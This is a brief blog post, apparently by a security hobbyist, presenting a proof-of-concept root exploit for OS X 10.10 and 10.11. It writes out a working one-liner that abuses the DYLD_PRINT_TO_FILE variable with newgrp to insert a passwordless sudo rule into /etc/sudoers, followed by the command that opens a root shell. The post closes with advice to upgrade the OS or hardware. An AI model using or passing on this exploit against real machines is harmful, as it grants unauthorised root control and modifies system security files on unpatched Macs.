no need to know the root password of OS X 10.10 and 10.11

PoC on how to use one-liner using an old version of macOS, and get a root shell.
I tested on el Capitan and probably work with previous iteration of OS.
command for the terminal. More about the PoC [1]
Ignore this output “bash: line 1: 3: Bad file descriptor.”

echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp

let’s check for sudo

sudo -s && whoami

If everything alright you will see a # in the begging and root name.

The best way is to upgrade the operating system. Well, macOS High Sierra has support until this November. For some models, OS support isn’t available. It would help if you upgraded your hardware. There is an excellent article about supported hardware and software [2].

I strongly recommend getting MacBook Pro 2012, or something since 2012, which supports macOS Catalina, it will get the latest security patches.

Reference

#1 https://www.scmagazineuk.com/tweetable-hack-pwn-mac/article/1479054
#2 https://eshop.macsales.com/guides/Mac_OS_X_Compatibility

Kibernetinio saugumo entuziastas; Aktyviausias Lietuvis TryHackMe platformoje; Inovacijų valdymo ir Antreprenerystės Magistrantas @ KTU